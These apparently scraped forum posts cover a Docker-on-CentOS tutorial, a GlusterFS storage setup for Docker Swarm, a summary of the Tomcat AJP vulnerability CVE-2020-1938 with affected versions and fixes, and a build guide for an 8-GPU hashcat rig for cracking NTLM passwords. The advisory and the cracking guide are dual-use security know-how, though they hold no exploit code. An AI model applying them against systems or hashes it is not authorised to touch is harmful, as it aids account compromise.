    NAME                            DESCRIPTION                                     STARS     OFFICIAL   AUTOMATED
    centos                          The official build of CentOS.                   2224      [OK]       
    jdeathe/centos-ssh              CentOS-6 6.7 x86_64 / CentOS-7 7.2.1511 x8...   22                   [OK]
    jdeathe/centos-ssh-apache-php   CentOS-6 6.7 x86_64 / Apache / PHP / PHP M...   17                   [OK]
    million12/centos-supervisor     Base CentOS-7 with supervisord launcher, h...   11                   [OK]
    nimmis/java-centos              This is docker images of CentOS 7 with dif...   10                   [OK]
    torusware/speedus-centos        Always updated official CentOS docker imag...   8                    [OK]
    nickistre/centos-lamp           LAMP on centos setup                            3                    [OK]
    
    ...

    In the OFFICIAL column, OK indicates an image built and supported by the company behind the project. Once you’ve identifed the image that you would like to use, you can download it to your computer using the pull subcommand, like so:

       docker pull centos

    After an image has been downloaded, you may then run a container using the downloaded image with the run subcommand. If an image has not been downloaded when docker is executed with the run subcommand, the Docker client will first download the image, then run a container using it:

       docker run centos

    To see the images that have been downloaded to your computer, type:

       docker images

    The output should look similar to the following:

    [secondary_lable Output]
    REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
    centos              latest              778a53015523        5 weeks ago         196.7 MB
    hello-world         latest              94df4f0ce8a4        2 weeks ago         967 B

    As you’ll see later in this tutorial, images that you use to run containers can be modified and used to generate new images, which may then be uploaded (pushed is the technical term) to Docker Hub or other Docker registries.

    Step 5 — Running a Docker Container

    The hello-world container you ran in the previous step is an example of a container that runs and exits, after emitting a test message. Containers, however, can be much more useful than that, and they can be interactive. After all, they are similar to virtual machines, only more resource-friendly.

    As an example, let’s run a container using the latest image of CentOS. The combination of the -i and -t switches gives you interactive shell access into the container:

       docker run -it centos

    Your command prompt should change to reflect the fact that you’re now working inside the container and should take this form:

    Output
    [root@59839a1b7de2 /]#

    Important: Note the container id in the command prompt. In the above example, it is 59839a1b7de2.

    Now you may run any command inside the container. For example, let’s install MariaDB server in the running container. No need to prefix any command with sudo, because you’re operating inside the container with root privileges:

       yum install mariadb-server

    Step 6 — Committing Changes in a Container to a Docker Image

    When you start up a Docker image, you can create, modify, and delete files just like you can with a virtual machine. The changes that you make will only apply to that container. You can start and stop it, but once you destroy it with the docker rm command, the changes will be lost for good.

    This section shows you how to save the state of a container as a new Docker image.

    After installing MariaDB server inside the CentOS container, you now have a container running off an image, but the container is different from the image you used to create it.

    To save the state of the container as a new image, first exit from it:

       exit

    Then commit the changes to a new Docker image instance using the following command. The -m switch is for the commit message that helps you and others know what changes you made, while -a is used to specify the author. The container ID is the one you noted earlier in the tutorial when you started the interactive docker session. Unless you created additional repositories on Docker Hub, the repository is usually your Docker Hub username:

       docker commit -m "What did you do to the image" -a "Author Name" container-id repository/new_image_name

    For example:

       docker commit -m "added mariadb-server" -a "Sunday Ogwu-Chinuwa" 59839a1b7de2 finid/centos-mariadb

    Note: When you commit an image, the new image is saved locally, that is, on your computer. Later in this tutorial, you’ll learn how to push an image to a Docker registry like Docker Hub so that it may be assessed and used by you and others.

    After that operation has completed, listing the Docker images now on your computer should show the new image, as well as the old one that it was derived from:

       docker images

    The output should be of this sort:

    Output
    REPOSITORY             TAG                 IMAGE ID            CREATED             SIZE
    finid/centos-mariadb   latest              23390430ec73        6 seconds ago       424.6 MB
    centos                 latest              778a53015523        5 weeks ago         196.7 MB
    hello-world            latest              94df4f0ce8a4        2 weeks ago         967 B

    In the above example, centos-mariadb is the new image, which was derived from the existing CentOS image from Docker Hub. The size difference reflects the changes that were made. And in this example, the change was that MariaDB server was installed. So next time you need to run a container using CentOS with MariaDB server pre-installed, you can just use the new image. Images may also be built from what’s called a Dockerfile. But that’s a very involved process that’s well outside the scope of this article. We’ll explore that in a future article.

    Step 7 — Listing Docker Containers

    After using Docker for a while, you’ll have many active (running) and inactive containers on your computer. To view the active ones, use:

       docker ps

    You will see output similar to the following:

    Output
    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
    f7c79cc556dd        centos              "/bin/bash"         3 hours ago         Up 3 hours                              silly_spence

    To view all containers — active and inactive, pass it the -a switch:

       docker ps -a

    To view the latest container you created, pass it the -l switch:

    docker ps -l

    Stopping a running or active container is as simple as typing:

       docker stop container-id

    The container-id can be found in the output from the docker ps command.

    Step 8 — Pushing Docker Images to a Docker Repository

    The next logical step after creating a new image from an existing image is to share it with a select few of your friends, the whole world on Docker Hub, or other Docker registry that you have access to. To push an image to Docker Hub or any other Docker registry, you must have an account there.

    This section shows you how to push a Docker image to Docker Hub.

    To create an account on Docker Hub, register at Docker Hub. Afterwards, to push your image, first log into Docker Hub. You’ll be prompted to authenticate:

       docker login -u docker-registry-username

    If you specified the correct password, authentication should succeed. Then you may push your own image using:

       docker push docker-registry-username/docker-image-name

    It will take sometime to complete, and when completed, the output will be of this sort:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    670194edfaf5: Pushed 
    5f70bf18a086: Mounted from library/centos 
    6a6c96337be1: Mounted from library/centos
    
    ...

    After pushing an image to a registry, it should be listed on your account’s dashboard, like that show in the image below.

    [attachment:5e6ad7111abcb]

    If a push attempt results in an error of this sort, then you likely did not log in:

    Output
    The push refers to a repository [docker.io/finid/centos-mariadb]
    e3fbbfb44187: Preparing
    5f70bf18a086: Preparing
    a3b5c80a4eba: Preparing
    7f18b442972b: Preparing
    3ce512daaf78: Preparing
    7aae4540b42d: Waiting
    unauthorized: authentication required

    Log in, then repeat the push attempt.

  8. Fri Mar 6 22:00:16 2020
    Men in Black started the conversation Docker Swarm Persistent Storage.

    Unless you’ve been living under a rock, you should need no explanation what Docker is. Using Docker over the last year has drastically improved my deployment ease and with coupled with GitLab’s CI/CD has made deployment extremely ease. Mind you, not all our applications being deployed have the same requirements, some are extremely simple and others are extraordinarily complex. So when we start a new project we have a base docker build to begin from and based on the applications requirements we add/remove as needed.

    A little about Docker Swarm

    For the large majority of most of our applications, having a volume associated with the deployed containers and storing information is the database fits the applications needs.

    In front of all our applications we used to use Docker Flow Proxy to quickly integrate our application into our deployed environment and assign it a subdomain based on it’s service. For a few months we experienced issues with the proxy hanging up, resources not being cleared, and lots of dropped connections. Since than I have rebuilt our docker infrastructure and now we use Traefik for our proxy routing and it has been absolutely amazing! It’s extremely fast, very robust and extensible, and easy to manipulate to fit your needs. Heck before even deploying it I was using docker-compose to build a local network proxy to ensure it was what we needed. While Traefik was running in compose I was hitting domains such as http://whoami.localhost/ and this was a great way to learn the basic configuration before pushing it into a staging/production swarm environment. (That explaing how we got started with Traefik is a whole other post of it’s own.)

    Now back to our docker swarm, I know the big thing right now is Kubernetes . But every organization has their specific needs, for their different environments, application, types, and deployment mechanisms. In my opinion the current docker environment we’ve got running right now is pretty robust. We’ve got dozens of nodes, a number of deployment environments (cybersec, staging, and production), dozens of applications running at once, and some of then requiring a number of services in order to function properly.

    A few of the things that won me over on the docker swarm in the first place is it’s load balancing capabilities, it’s very fault-tolerant, and the self-healing mechanism that it uses in case a container crashes, a node locks up or drops, or a number of other issues. (We’ve had a number of servers go down due to networking issues or a rack server crapping out and with the docker swarm running you could never even tel we were having issues as an end user to our applications.)

    (Below is an image showing traffic hitting the swarm. If you have an application replicated upon deployment, traffic will be distributed amongst the nodes to prevent bottle necks.)

    -image-

    Why would you need persistent storage?

    Since the majority of our applications are data orientated, (with most of them hitting several databases in a single request) we hadn’t really had to worry about persistent storage. This is because once we deployed the applications; their volumes held all of their required assets and any data they needed was fetched from the database.

    The easiest way to explain volumes, is when a container is deployed to a node (if specified) it will put aside a section of storage specifically for that container. For example say we have an application called DogTracker the was deployed on node A and B. This application can create and store files in their volumes on those nodes. But what happens when there’s an issue with the container on node A and the container cycles to node C? The data created by the container is left in the volume on node A an no longer available, until that applications container cycles back to node A.

    And from this arises the problem we began to face. We were starting to develop applications that were starting to require files to be shared amongst each other. We also have numerous applications that require files to be saved and distributed without them being dumped into the database as a blob. And these files were required to be available without cycling volumes and/or dumping them into the containers during build time. And because of this, we needed to be able to have some form of persistent and distributed file storage across our containers.

    (Below is an image showing how a docker swarms volumes are oriented)

    -image-

    How we got around this!

    Now in this day an age there’s got to be ways to get around this. There’s at least 101 ways to do just about anything and it doesn’t always have to be newest shiniest toy everyone’s using. I know saying this while using Docker is kind of a hypocritical statement, but shared file systems have been around for decades. You’ve been able to mount network drives, ftp drives, have organizational based shared folders, the list can go on for days.

    But the big question is, how do we get a container to mount a local shared folder or distribute volumes across all swarm nodes? Well, there’s a whole list of distributed filesystems and modern storage mechanisms in the docker documentation . Below is a list of the top recommended alternatives I found for distributed file systems or NFS’s for the docker stratosphere around container development.

    I know you’re wondering why we didn’t use S3 , DigitalOcean Spaces , GCS , or some other cloud storage. But internally we have a finite amount of resources and we can spin up VM’s and be rolling in a matter of moments. Especially considering we have build a number of Ansible playbooks to quickly provision our servers. Plus, why throw resources out on the cloud, when it’s not needed. Especially when we can metaphorically create our own network based file system and have our own cloud based storage system.

    (Below is an image showing we want to distribute file system changes)

    -image-

    After looking at several methods I settled on GlusterFS a scalable network filesystem. Don’t get me wrong, a number of the other alternatives are pretty ground breaking and some amazing work as been put into developing them. But I don’t have thousands of dollars to drop on setting up a network file system, that may or may not work for our needs. There were also several others that I did look pretty heavily into, such as StorageOS and Ceph . With StorageOS I really liked the idea of a container based file system that stores, synchronizing, and distributes files to all other storage nodes within the swarm. And it may just be me, but Ceph looked like the prime competitor to Gluster. They both have their high points and seem to work very reliable. But at the time; it wasn’t for me and after using Gluster for a few months, I believe that I made the right choice and it’s served it’s purpose well.

    [attachment:5e6268fd50592]

    Gluster Notes

    (Note: The following steps are to be used on a Debian/Ubuntu based install.)

    Documentation for using Gluster can be found on their docs . Their installation instructions are very brief and explain how to install the gluster packages, but they don’t go into depth in how to setup a Gluster network. I also suggest thoroughly reading through to documentation to understand Gluster volumes, bricks, pools, etc.

    Installing GlusterFS

    To begin you will need to list all of the Docker Swarm nodes you wish to connect in the /etc/hosts files of each server. On linux (Debian/Ubuntu), you can get the current nodes IP Address run the following command hostname -I | awk '{print $1}'

    (The majority of the commands listed below need to be ran on each and every node simultaneously unless specified. To do this I opened a number of terminal tabs and connected to each server in a different tab.)

    # /etc/hosts
    10.10.10.1 staging1.example.com staging1
    10.10.10.2 staging2.example.com staging2
    10.10.10.3 staging3.example.com staging3
    10.10.10.4 staging4.example.com staging4
    10.10.10.5 staging5.example.com staging5
    # Update & Upgrade all installed packages
    apt-get update && apt-get upgrade -y
    
    # Install gluster dependencies
    sudo apt-get install python-software-properties -y

    Add the GlusterFS PPA package the list of trusted packages to install from a community repository.

    sudo add-apt-repository ppa:gluster/glusterfs-3.10;
    sudo apt-get update -y && sudo apt-get update

    Now lets install gluster

    sudo apt-get install -y glusterfs-server attr

    Now before starting the Gluster service but I had to copy some files into systemd (you may or may not have to do this). But since Gluster was developed by RedHat primarily for RedHat and CentOS, I had a few issues starting the system service.

    sudo cp /etc/init.d/glusterfs-server /etc/systemd/system/

    Let’s start and enable the glusterfs system service

    systemctl enable glusterfs-server; systemctl start glusterfs-server

    This step isn’t necessary, but I like to verify that

    # Verify the gluster service is enabled
    systemctl is-enabled glusterfs-server
    # Check the system service status of the gluster-server
    systemctl status glusterfs-server

    If for some reason you haven’t done this yet, each and every node should have it’s own ssh key generated.

    (The only reason I can think of why they wouldn’t have a different key is if a VM was provisioned and than cloned for similar use across a swarm.)

    # This is to generate a very basic SSH key, you may want to specify a key type such as ED25519 or bit length if required.
    ssh-keygen -t rsa

    Dependant on your Docker Swarm environment and which server you’re running as a manager; you’ll probably want one of the node managers to also be a gluster node manager as well. I’m going to say server staging1 is one of our node managers, so on this server we’re going to probe all other gluster nodes to add them to the gluster pool. (Probing them essentially is saying this manager is telling all servers on this list to connect to each-other.)

    gluster peer probe staging1; gluster peer probe staging2; gluster peer probe staging3; gluster peer probe staging4; gluster peer probe staging5;

    It’s not required, but probably good practice to ensure all of the nodes have connected to the pool before setting up the file system.

    gluster pool list
    
    # => You should get results similar to the following
    UUID					Hostname 	State
    a8136a2b-a2e3-437d-a003-b7516df9520e	staging3 	Connected
    2a2f93f6-782c-11e9-8f9e-2a86e4085a59	staging2 	Connected
    79cb7ec0-f337-4798-bde9-dbf148f0da3b	staging4 	Connected
    3cfc23e6-782c-11e9-8f9e-2a86e4085a59	staging5 	Connected
    571bed3f-e4df-4386-bd46-3df6e3e8479f	localhost	Connected
    
    # You can also run the following command to another set of results
    gluster peer status

    Now lets create the gluster data storage directories (It’s very important you do this on every node. This is because this directory is where all gluster nodes will store the distributed files locally.)

    sudo mkdir -p /gluster/brick

    Now lets create a gluster volume across all nodes (again run this on the master node/node manager).

    sudo gluster volume create staging-gfs replica 5 staging1:/gluster/brick staging2:/gluster/brick staging3:/gluster/brick staging4:/gluster/brick staging5:/gluster/brick force

    The next step is to initialize the glusterFS to begin synchronizing across all nodes.

    gluster volume start staging-gfs

    This step is also not required, but I prefer to verify the gluster volume replicated across all of the designated nodes.

    gluster volume info

    No let’s ensure we have gluster mount the /mtn directory for it’s shared directory especially on a reboot. (It’s important to run these commands on all gluster nodes.)

    sudo umount /mnt
    sudo echo 'localhost:/staging-gfs /mnt glusterfs defaults,_netdev,backupvolfile-server=localhost 0 0' >> /etc/fstab
    sudo mount.glusterfs localhost:/staging-gfs /mnt
    sudo chown -R root:docker /mnt

    (You may have noticed the setting of file permissions using [i]chown -R root:docker this is to ensure docker will have read/write access to the files in the specified directory.)[/i]

    If for some reason you’ve already deployed your staging gluster-fs and need to remount the staging-gfs volume you can run the following command. Otherwise you should be able to skip this step.

    sudo umount /mnt; sudo mount.glusterfs localhost:/staging-gfs /mnt; sudo chown -R root:docker /mnt

    Let’s list all of our mounted partitions and ensure that the staging-gfs is listed.

    df -h
    
    # => staging-gfs should be listed in the partitions/disks listed
    localhost:/staging-gfs              63G   13G   48G  21% /mnt

    Now that all of the work is pretty much done, now comes the fun part lets test to make sure it all works. Lets cd into the /mnt directory and create a few files to make sure they will sync across all nodes. (I know this is one of the first things I wanted to try out.) You can do one of the following commands to generate a random file in the /mnt directory. Now depending on your servers and network connections this should sync up across all nodes almost instantly. The way I tested this I was in the /mtn directory on several nodes in several terminals. And as soon as I issued the command I was running the ls command in the other tabs. And depending on the file size, it may not sync across all nodes instantly, but is at least accessible.

    # This creates a 24MB file full of zeros
    dd if=/dev/zero of=output.dat bs=24M  count=1
    
    # Creates a 2MB file of random characters
    dd if=/dev/urandom of=output.log bs=1M count=2

    Using GlusterFS with Docker

    Now that all the fun stuff is done if you have looked at docker volumes or bind mounts this would probably be a good time. Usually docker will store a volumes contents in a folder structure similar to the following: /var/lib/docker/volumes/DogTracker/_data.

    But in your docker-compose.yml or docker-stack.yml you can specify specific mount points for the docker volumes. If you look at the following YAML snippet you will notice I’m saying to store the containers /opt/couchdb/data directory on the local mount point /mnt/staging_couch_db.

    version: '3.7'
    services:
      couchdb:
      image: couchdb:2.3.0
      volumes:
       - type: bind
         source: /mnt/staging_couch_db
         target: /opt/couchdb/data
      networks:
        - internal
      deploy:
        resources:
          limits:
            cpus: '0.30'
            memory: 512M
          reservations:
            cpus: '0.15'
            memory: 256M

    Now as we had previously demonstrated any file(s) saved, created, and/or deleted in the /mtn directory will be synchronized across all of the GlusterFS nodes.

    I’d just like to mention this may not work for everyone, but this is the method that worked best for use. We’ve been running a number of different Gluster networks for several months now with no issues thus far.

  9. Tue Mar 3 10:38:52 2020

    Recently, a new vulnerability on Apache Tomcat AJP connector was disclosed.

    The flaw was discovered by a security researcher of Chaitin Tech [1] and allows a remote attacker to read any webapps files or include a file.

    The AJP Connector

    The AJP Connector [3] is generally used to manage (internal) requests, usually on port 8009, coming for example from an Apache HTTP Server.
    The vulnerability (CVE-2020-1938) could be remotely exploited if port 8009 is publicly exposed.

    defaultAccording to a tweet by Joao Matos [2], the vulnerability is not a default RCE (Remote Command Execution), but a LFI (Local File Inclusion) that can be turner in RCE:

    CVE-2020-1938 is NOT a default Remote Code Execution vul. It is a LFI. So, IF you can:

    1. upload files via an APP feature &
    2. these files are saved inside the document root (eg. webapps/APP/… &
    3. reach the AJP port directly;

    Thus, it can be turned in RCE.

    A Proof-of-Concept for the vulnerability has been realeased on Github, without any additional details.
    Furthermore, researcher also published an “online detection tool” useful to remotely check vulnerability.

    [attachment:5e5dd0b43629b]

    Which Tomcat versions are affected?

    • Tomcat 6 (no longer maintained)
    • Tomcat 7.x < 7.0.100
    • Tomcat 8.x < 8.5.51
    • Tomcat 9.x < 9.0.31

    Is there a fix?

    Apache Tomcat has officially released versions 9.0.31, 8.5.51, and 7.0.100 to fix this vulnerability.
    To fix this vulnerability correctly, you first need to determine if the Tomcat AJP Connector service is used in your server environment:
    –If no cluster or reverse proxy is used, you can basically determine that AJP is not used.
    –Otherwise, you need to figure out if the cluster or reverse server is communicating with the Tomcat AJP Connector service.

    For additional details about fixing, please refer to the advisory.
    As usual, update ASAP (and check port 8009 exposure)!

    References

  10. 7 months ago
    Tue Feb 11 20:56:03 2020
    Men in Black started the conversation How to build a (2nd) 8 GPU password cracker.

    [attachment:5e42b0e46185a]

    Background

    In February 2017, we took our first shot at upgrading our old open-frame 6 GPU cracker (NVIDIA 970). It served us well, but we needed to crack 8 and 9-character NTLM hashes within hours and not days. The 970s were not cutting it and cooling was always a challenge. Our original 8 GPU rig was designed to put our cooling issues to rest.

    Speaking of cooling issues, we enjoyed reading all of the comments on our 2017 build. Everyone seemed convinced that we were about to melt down our data center. We thank everyone for their concern (and entertainment).

    • "the graphics cards are too close!"
    • "nonsense. GTX? LOL. No riser card? LOL good luck."

    To address cooling, we specifically selected (at the time) NVIDIA 1080 Founders Edition cards due to their 'in the front and out the rear' centrifugal fan design. A couple months after our initial blog, we upgraded from NVIDIA 1080 to NVIDIA 1080 Ti cards. And admitedly, we later found that more memory was useful when cracking with large (>10GB) wordlists.

    OK, But Why?

    Shortly after building our original 8 GPU cracker, we took it to RSA and used it as part of a narrated live hacking demo. Our booth was a play on the Warlock’s command center where we hacked Evil Corp from the comfort of Ma’s Basement. (yeah, a bit unique for RSA…)

    [attachment:5e42b14ad8bd1]

    Shopping List

    You have a little flexibility here, but we’d strongly suggest the Tyan chassis and Founders Edition NVIDIA cards. The Tyan comes with the motherboard, power supplies (3x), and arrives all cabled up and ready to build. We went with a 4TB SSD to hold some very large wordlists but did not setup RAID with a 2nd drive (yet). Higher CPU speeds and memory mostly help with dictionary attacks; therefore a different build may be better suited for non-GPU cracking.
    Hardware

    • Tyan B7079F77CV10HR-N
    • 2x Intel Xeon E5-2630 V4 Broadwell-EP 2.2 GHz (LGA 2011-3 85W)

    +Be sure to get V3 or V4 (V4 recommended to support DDR4 2400 RAM)! *We learned the hard way!

    • 128GB (4 x 32GB) DDR4 2400 (PC4 19200) 288-Pin 1.2V ECC Registered DIMM
    • Samsung EVO 4TB 2.5” SSD

    Software

    • Ubuntu - 18.04 LTS server (x64)
    • hashcat - www.hashcat.net
    • hashview - www.hashview.io

    Cost

    • Depends heavily on the current market price of GPUs. ($12K-$17K)
    • At least the software is all free! And who can put a price on cracking performance?

    The Build

    Despite being a hash munching monster and weighing nearly 100 lbs. when assembled, this build is easy enough for novice.

    [attachment:5e42b1b6577c8]

    Hardware Build Notes

    • Normally I like to install the CPU(s) first, but I ordered the wrong ones and had to install them 3 days later. Be sure to get V3 or V4 XEON E5 processors, V2 is cheaper but ‘it don’t fit’.

    +When installing the (included) Tyan heat-sinks, we added a little extra thermal paste even through the heat-sinks already have some on the bottom.

    • Install memory starting in Banks A and E (see diagram above). CPU 0 and CPU 1 each require matching memory. Memory Banks A-D are for CPU 0 and Memory Banks E-H are for CPU 1. We added 2x 32GB in Bank A and 2x 32GB in Bank E for a total of 128GB RAM.
    • Install hard drive for (Linux) operating system. We chose a 4TB SSD drive to ensure plenty of storage for large wordlists and optimum read/write performance. The chassis has 10 slots so feel free to go crazy with RAID and storage if you wish.
    • Prep all 8 GPU cards by installing the included Tyan GPU mounting brackets. They are probably not required, but they ensure a good seat.
    • Install GPU cards. Each NVIDIA 1080 Ti requires 2 power connections per card. The regular 1080 cards only require 1 if you decide not to go the ‘Ti’ route. Again, Tyan includes all necessary power cables with the chassis.
    • Connect or insert OS installation media. I hate dealing with issues related to booting and burning ISOs written to USB flash; so we went with a DVD install (USB attached drive).
    • Connect all 3 power cords to the chassis and connect the other end of each cord to a dedicated 15A or 20A circuit. While cracking, the first 2 power supplies draw 700-900W with a less on the 3rd. They do like dedicated circuits though, it is easy to trip breakers if anything else is sharing the circuit.

    Software Build Notes

    Everyone has their own preferred operating system and configuration, so we’ve decided not to go telling you how to do your thing. If you are new to installing and using a Linux operating system, we did include a complete walk-through in our February 2017 post: How to build a 8 GPU password cracker.

    The basic software build steps are as follows:

    • Install your preferred Linux OS. We chose Ubuntu 18.04 LTS (64 bit - server). Fully update and upgrade.
    • Prepare for updated NVIDIA drivers:

    +Blacklist the generic NVIDIA Nouveau driver

    sudo bash -c "echo blacklist nouveau > /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo bash -c "echo options nouveau modeset=0 >> /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo update-initramfs -u
    sudo reboot

    +Add 32-bit headers

    sudo dpkg --add-architecture i386
    sudo apt-get update
    sudo apt-get install build-essential libc6:i386

    +Download, unzip and install the latest NVIDIA driver from http://www.nvidia.com/Download/index.aspx

    [attachment:5e42b2434baa9]

    sudo ./NVIDIA*.run
    sudo reboot

    The Outcome

    Go ahead, run a benchmark with hashcat to make sure everything works!

    ./hashcat-5.0.0/hashcat64.bin -m 1000 -b

View more